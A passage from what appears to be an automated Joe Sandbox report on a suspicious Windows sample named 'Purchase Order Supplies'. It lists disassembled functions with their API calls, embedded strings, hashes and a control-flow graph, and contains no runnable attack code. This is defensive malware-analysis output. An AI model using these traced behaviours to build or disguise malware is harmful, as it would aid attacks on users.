                          • RegCloseKey.KERNEL32(000000FE,000000FE,00000000,?,00000000), ref: 00CF34F5
                          • RegCloseKey.ADVAPI32(00000000), ref: 00CF3502
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                          • String ID:
                          • API String ID: 1240663315-0
                          • Opcode ID: afd945ac6fc6ec7cc033373fa7072eac623cb74ea3e42cc32b651cdfd7bb03c8
                          • Instruction ID: 75206701b4ade375ddc2fd0462e9ec70f5fb732e3a0f3619e12e3c7e3bc5c569
                          • Opcode Fuzzy Hash: afd945ac6fc6ec7cc033373fa7072eac623cb74ea3e42cc32b651cdfd7bb03c8
                          • Instruction Fuzzy Hash: D1E19D31204205AFCB15DF29C894E6ABBF9EF89310F04856DF55ADB2A1DB30EE05DB52
                          Function 00C929C2 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151timewindowregistryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1278 c929c2-c929e2 1280 c92a42-c92a44 1278->1280 1281 c929e4-c929e7 1278->1281 1280->1281 1282 c92a46 1280->1282 1283 c929e9-c929f0 1281->1283 1284 c92a48 1281->1284 1285 c92a2b-c92a33 NtdllDefWindowProc_W 1282->1285 1288 c92aac-c92ab4 PostQuitMessage 1283->1288 1289 c929f6-c929fb 1283->1289 1286 d02307-d02335 call c9322e call caec33 1284->1286 1287 c92a4e-c92a51 1284->1287 1291 c92a39-c92a3f 1285->1291 1321 d0233a-d02341 1286->1321 1292 c92a53-c92a54 1287->1292 1293 c92a76-c92a9d SetTimer RegisterClipboardFormatW 1287->1293 1290 c92a72-c92a74 1288->1290 1295 c92a01-c92a03 1289->1295 1296 d0238f-d023a3 call cd57fb 1289->1296 1290->1291 1301 c92a5a-c92a6d KillTimer call c92b94 call c92ac7 1292->1301 1302 d022aa-d022ad 1292->1302 1293->1290 1297 c92a9f-c92aaa CreatePopupMenu 1293->1297 1298 c92a09-c92a0e 1295->1298 1299 c92ab6-c92ac0 call c91e58 1295->1299 1296->1290 1315 d023a9 1296->1315 1297->1290 1305 d02374-d0237b 1298->1305 1306 c92a14-c92a19 1298->1306 1316 c92ac5 1299->1316 1301->1290 1309 d022e3-d02302 MoveWindow 1302->1309 1310 d022af-d022b1 1302->1310 1305->1285 1320 d02381-d0238a call ccb31f 1305->1320 1313 c92a1f-c92a25 1306->1313 1314 d0235f-d0236f call cd5fdb 1306->1314 1309->1290 1317 d022d2-d022de SetFocus 1310->1317 1318 d022b3-d022b6 1310->1318 1313->1285 1313->1321 1314->1290 1315->1285 1316->1290 1317->1290 1318->1313 1322 d022bc-d022cd call c9322e 1318->1322 1320->1285 1321->1285 1326 d02347-d0235a call c92b94 call c93598 1321->1326 1322->1290 1326->1285
                          APIs
                          • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 00C92A33
                          • KillTimer.USER32(?,00000001), ref: 00C92A5D
                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C92A80
                          • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00C92A8B
                          • CreatePopupMenu.USER32 ref: 00C92A9F
                          • PostQuitMessage.USER32(00000000), ref: 00C92AAE
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                          • String ID: TaskbarCreated
                          • API String ID: 157504867-2362178303
                          • Opcode ID: fc777f723e47f8ce6c58ebbfbe9d72b24bc966b97177af57176c318b3cd00225
                          • Instruction ID: 7fb49edef1761ccbed139cc9cb2d1824fbfb64bb1378e24fd04be5d7fe7d0655
                          • Opcode Fuzzy Hash: fc777f723e47f8ce6c58ebbfbe9d72b24bc966b97177af57176c318b3cd00225
                          • Instruction Fuzzy Hash: 9841113220038ABBDF34AF689C0DBBA365AE714341F044219FD86D62E1DF749D40A775
                          Function 00CAE47B Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                          Download Yara Rule
                          APIs
                          • GetVersionExW.KERNEL32(?), ref: 00CAE4A7
                            • Part of subcall function 00C97E53: _memmove.LIBCMT ref: 00C97EB9
                          • GetCurrentProcess.KERNEL32(00000000,00D2DC28,?,?), ref: 00CAE567
                          • GetNativeSystemInfo.KERNEL32(?,00D2DC28,?,?), ref: 00CAE5BC
                          • FreeLibrary.KERNEL32(00000000,?,?), ref: 00CAE5C7
                          • FreeLibrary.KERNEL32(00000000,?,?), ref: 00CAE5DA
                          • GetSystemInfo.KERNEL32(?,00D2DC28,?,?), ref: 00CAE5E4
                          • GetSystemInfo.KERNEL32(?,00D2DC28,?,?), ref: 00CAE5F0
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion_memmove
                          • String ID:
                          • API String ID: 2717633055-0
                          • Opcode ID: fff44c07cc1d8ef1e01fde85bc5f742b4c84bab44ffd6b58284c1a45ffb52b81
                          • Instruction ID: cb9d1738eab1036bcf710be9e6588e1174c4298ca18ecaede83b9679c9939e40
                          • Opcode Fuzzy Hash: fff44c07cc1d8ef1e01fde85bc5f742b4c84bab44ffd6b58284c1a45ffb52b81
                          • Instruction Fuzzy Hash: 4061E2B1C0A385DFCF15CF68A8C51E97FB56F2A308F2845D9D8489B247D624CA09CFA5
                          Function 00C931F2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                          Download Yara Rule
                          APIs
                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00C93202
                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 00C93219
                          • LoadResource.KERNEL32(?,00000000), ref: 00D057D7
                          • SizeofResource.KERNEL32(?,00000000), ref: 00D057EC
                          • LockResource.KERNEL32(?), ref: 00D057FF
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                          • String ID: SCRIPT
                          • API String ID: 3051347437-3967369404
                          • Opcode ID: a8f1f2df11ad0e8a35f0339b0added8cb7d914f7424b6d41724659fff0423dcf
                          • Instruction ID: 7c1676382473f867a000264f33521c44a5e097ed10668bb81c901fe5463ec1c7
                          • Opcode Fuzzy Hash: a8f1f2df11ad0e8a35f0339b0added8cb7d914f7424b6d41724659fff0423dcf
                          • Instruction Fuzzy Hash: BC117970200B41BFEB258B65EC48F677BBAEBC9B41F208028F422D6290DB71DD01CA71
                          Function 00CD6F5B Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00CD6F7D
                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00CD6F8D
                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 00CD6FAC
                          • __wsplitpath.LIBCMT ref: 00CD6FD0
                          • _wcscat.LIBCMT ref: 00CD6FE3
                          • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00CD7022
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                          • String ID:
                          • API String ID: 1605983538-0
                          • Opcode ID: 2600fb59a060345d9d63aa782b10a2fd7de4a8431986894425e482210acbeb75
                          • Instruction ID: b2d57095f6b99ce4befa8b69aa7cc6508ab8a755319c9b803bc72fb0aaddb2dc
                          • Opcode Fuzzy Hash: 2600fb59a060345d9d63aa782b10a2fd7de4a8431986894425e482210acbeb75
                          • Instruction Fuzzy Hash: CB216571904218BBDB11ABA4DC89BEEB7BDAB48300F5004A6F645D3241EB75AF85DB60
                          Function 00CA2B40 Relevance: 6.6, APIs: 2, Strings: 1, Instructions: 1382COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CB010A: std::exception::exception.LIBCMT ref: 00CB013E
                            • Part of subcall function 00CB010A: __CxxThrowException@8.LIBCMT ref: 00CB0153
                          • _memmove.LIBCMT ref: 00CA2C63
                          • _memmove.LIBCMT ref: 00CA303A
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: _memmove$Exception@8Throwstd::exception::exception
                          • String ID: @
                          • API String ID: 1300846289-2766056989
                          • Opcode ID: 63715d3b6c46d7119a95e7f8ea49f64b91c5c861b7d8dc27e5ca18ff01f4c7d9
                          • Instruction ID: b103ceee3cc05f8ba4b50c4933e4c5ae1e7f06ae4376b66063de34ef372d89db
                          • Opcode Fuzzy Hash: 63715d3b6c46d7119a95e7f8ea49f64b91c5c861b7d8dc27e5ca18ff01f4c7d9
                          • Instruction Fuzzy Hash: 4FC29C74A00256DFCF14DF98C890AADB7B1FF4A308F248059E856AB391D735EE45DBA0
                          Function 00CADD92 Relevance: 4.5, APIs: 3, Instructions: 26fileCOMMON
                          Download Yara Rule
                          APIs
                          • GetFileAttributesW.KERNEL32(00C9C848,00C9C848), ref: 00CADDA2
                          • FindFirstFileW.KERNEL32(00C9C848,?), ref: 00D04A83
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: File$AttributesFindFirst
                          • String ID:
                          • API String ID: 4185537391-0
                          • Opcode ID: 6667d691d2b94a132d373df52565adfd576aaff934aa5ddf41c28b44d262546c
                          • Instruction ID: 5870d0a2c2783d58dc2f5dd7692a768aae1aa7c4ab1e6f78ef3db967235645a7
                          • Opcode Fuzzy Hash: 6667d691d2b94a132d373df52565adfd576aaff934aa5ddf41c28b44d262546c
                          • Instruction Fuzzy Hash: A0E092718147117B821467389C0D8E9375D9B0633CB144709F936C11E0EB709D8585F6
                          Function 00C9DCD0 Relevance: 3.5, APIs: 2, Instructions: 540COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c1883b258174de6bebcaa1e06bf65149895a10d5ffec137c2d9a7f42b24a86ac
                          • Instruction ID: b8c42c78e2471564a241822681b87596ceb1fc13af67517b8bbe23421fb5db9f
                          • Opcode Fuzzy Hash: c1883b258174de6bebcaa1e06bf65149895a10d5ffec137c2d9a7f42b24a86ac
                          • Instruction Fuzzy Hash: D8228C75900206CFDF14DF58C489BAEB7F0FF19300F148169E89AAB391E770A985DBA1
                          Function 00CA3680 Relevance: 2.5, APIs: 1, Instructions: 986COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: BuffCharUpper
                          • String ID:
                          • API String ID: 3964851224-0
                          • Opcode ID: d1af0f9e9f6ae2dbc7f38fc6ebb2dece9e2948053e82e51972ad1d4f33b08c8b
                          • Instruction ID: eca113222ccff56aa74620bc96725cefe77bbe19a64b4e8a176179bdbd821183
                          • Opcode Fuzzy Hash: d1af0f9e9f6ae2dbc7f38fc6ebb2dece9e2948053e82e51972ad1d4f33b08c8b
                          • Instruction Fuzzy Hash: 6D9269706083428FD724DF18C494B6AB7E0BF89308F18895DF99A8B3A2D771ED45DB52
                          Function 00D0C146 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: NameUser
                          • String ID:
                          • API String ID: 2645101109-0
                          • Opcode ID: 0740c44e3ff24f7568a6c6a1a56000978ba42ab7c2dc5ab231df31b109fc8cc3
                          • Instruction ID: b670b64a9a0cceae709cf4cb6954530b8b574293f8e396adadd7c85b8d46e0e4
                          • Opcode Fuzzy Hash: 0740c44e3ff24f7568a6c6a1a56000978ba42ab7c2dc5ab231df31b109fc8cc3
                          • Instruction Fuzzy Hash: ECC04CB140410DEFC715CB80C945EEFB7BCBB08300F104096A155E1140D770DB459F71
                          Function 00C9E1F0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 815windowsleeptimeCOMMON
                          Download Yara Rule
                          APIs
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C9E279
                          • timeGetTime.WINMM ref: 00C9E51A
                          • TranslateMessage.USER32(?), ref: 00C9E646
                          • DispatchMessageW.USER32(?), ref: 00C9E651
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C9E664
                          • LockWindowUpdate.USER32(00000000), ref: 00C9E697
                          • DestroyWindow.USER32 ref: 00C9E6A3
                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C9E6BD
                          • Sleep.KERNEL32(0000000A), ref: 00D05B15
                          • TranslateMessage.USER32(?), ref: 00D062AF
                          • DispatchMessageW.USER32(?), ref: 00D062BD
                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D062D1
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                          • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                          • API String ID: 2641332412-570651680
                          • Opcode ID: 34bba151442c34c14e9389b0cc89b98696d3a5cf8bbbc8a07740f4dfdf5a9a6f
                          • Instruction ID: 258adb350ee399d42b93b42ccfc12ff6837c11958a8f194a42d5316497ccd8fb
                          • Opcode Fuzzy Hash: 34bba151442c34c14e9389b0cc89b98696d3a5cf8bbbc8a07740f4dfdf5a9a6f
                          • Instruction Fuzzy Hash: 13620470504341DFDB24DF64C889BAA77E4BF55304F08496DF98A8B2D2DB70E988DB62
                          Function 00CC6A28 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • ___createFile.LIBCMT ref: 00CC6C73
                          • ___createFile.LIBCMT ref: 00CC6CB4
                          • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00CC6CDD
                          • __dosmaperr.LIBCMT ref: 00CC6CE4
                          • GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00CC6CF7
                          • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00CC6D1A
                          • __dosmaperr.LIBCMT ref: 00CC6D23
                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00CC6D2C
                          • __set_osfhnd.LIBCMT ref: 00CC6D5C
                          • __lseeki64_nolock.LIBCMT ref: 00CC6DC6
                          • __close_nolock.LIBCMT ref: 00CC6DEC
                          • __chsize_nolock.LIBCMT ref: 00CC6E1C
                          • __lseeki64_nolock.LIBCMT ref: 00CC6E2E
                          • __lseeki64_nolock.LIBCMT ref: 00CC6F26
                          • __lseeki64_nolock.LIBCMT ref: 00CC6F3B
                          • __close_nolock.LIBCMT ref: 00CC6F9B
                            • Part of subcall function 00CBF84C: CloseHandle.KERNEL32(00000000,00D3EEC4,00000000,?,00CC6DF1,00D3EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00CBF89C
                            • Part of subcall function 00CBF84C: GetLastError.KERNEL32(?,00CC6DF1,00D3EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00CBF8A6
                            • Part of subcall function 00CBF84C: __free_osfhnd.LIBCMT ref: 00CBF8B3
                            • Part of subcall function 00CBF84C: __dosmaperr.LIBCMT ref: 00CBF8D5
                            • Part of subcall function 00CB889E: __getptd_noexit.LIBCMT ref: 00CB889E
                          • __lseeki64_nolock.LIBCMT ref: 00CC6FBD
                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00CC70F2
                          • ___createFile.LIBCMT ref: 00CC7111
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00CC711E
                          • __dosmaperr.LIBCMT ref: 00CC7125
                          • __free_osfhnd.LIBCMT ref: 00CC7145
                          • __invoke_watson.LIBCMT ref: 00CC7173
                          • __wsopen_helper.LIBCMT ref: 00CC718D
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                          • String ID: @
                          • API String ID: 3896587723-2766056989
                          • Opcode ID: 6bdf879f995bdb2896461f5c780c07596e0d54fc1e60224dbe025ab638e1a287
                          • Instruction ID: 2548808112ab60778633e6fa1a202edd7e05e9605eb607cc0d19ccca1b86d1da
                          • Opcode Fuzzy Hash: 6bdf879f995bdb2896461f5c780c07596e0d54fc1e60224dbe025ab638e1a287
                          • Instruction Fuzzy Hash: 8D2213719042069BEB259F68DD51FEE7B61EB01320F28426DE931EB2E2C735CE40EB51
                          Function 00CD76DB Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178COMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • GetFileVersionInfoSizeW.KERNELBASE(?,?), ref: 00CD76ED
                          • GetFileVersionInfoW.KERNELBASE(?,00000000,00000000,00000000,?,?), ref: 00CD7713
                          • _wcscpy.LIBCMT ref: 00CD7741
                          • _wcscmp.LIBCMT ref: 00CD774C
                          • _wcscat.LIBCMT ref: 00CD7762
                          • _wcsstr.LIBCMT ref: 00CD776D
                          • 74AB1560.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00CD7789
                          • _wcscat.LIBCMT ref: 00CD77D2
                          • _wcscat.LIBCMT ref: 00CD77D9
                          • _wcsncpy.LIBCMT ref: 00CD7804
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: _wcscat$FileInfoVersion$B1560Size_wcscmp_wcscpy_wcsncpy_wcsstr
                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                          • API String ID: 398981869-1459072770
                          • Opcode ID: 730f53878c1417a248610e5caa527773117619c9732033861c72a354cc414527
                          • Instruction ID: be6e7aee27e404bb43030a50e541fdc0d319360c8bb910e2b7f69c4826b21e61
                          • Opcode Fuzzy Hash: 730f53878c1417a248610e5caa527773117619c9732033861c72a354cc414527
                          • Instruction Fuzzy Hash: 364104719442107EEB01A7649C87EFF77ACEF15720F140156F901E3292FB749A01E6B1
                          Function 00C91F04 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 346COMMON
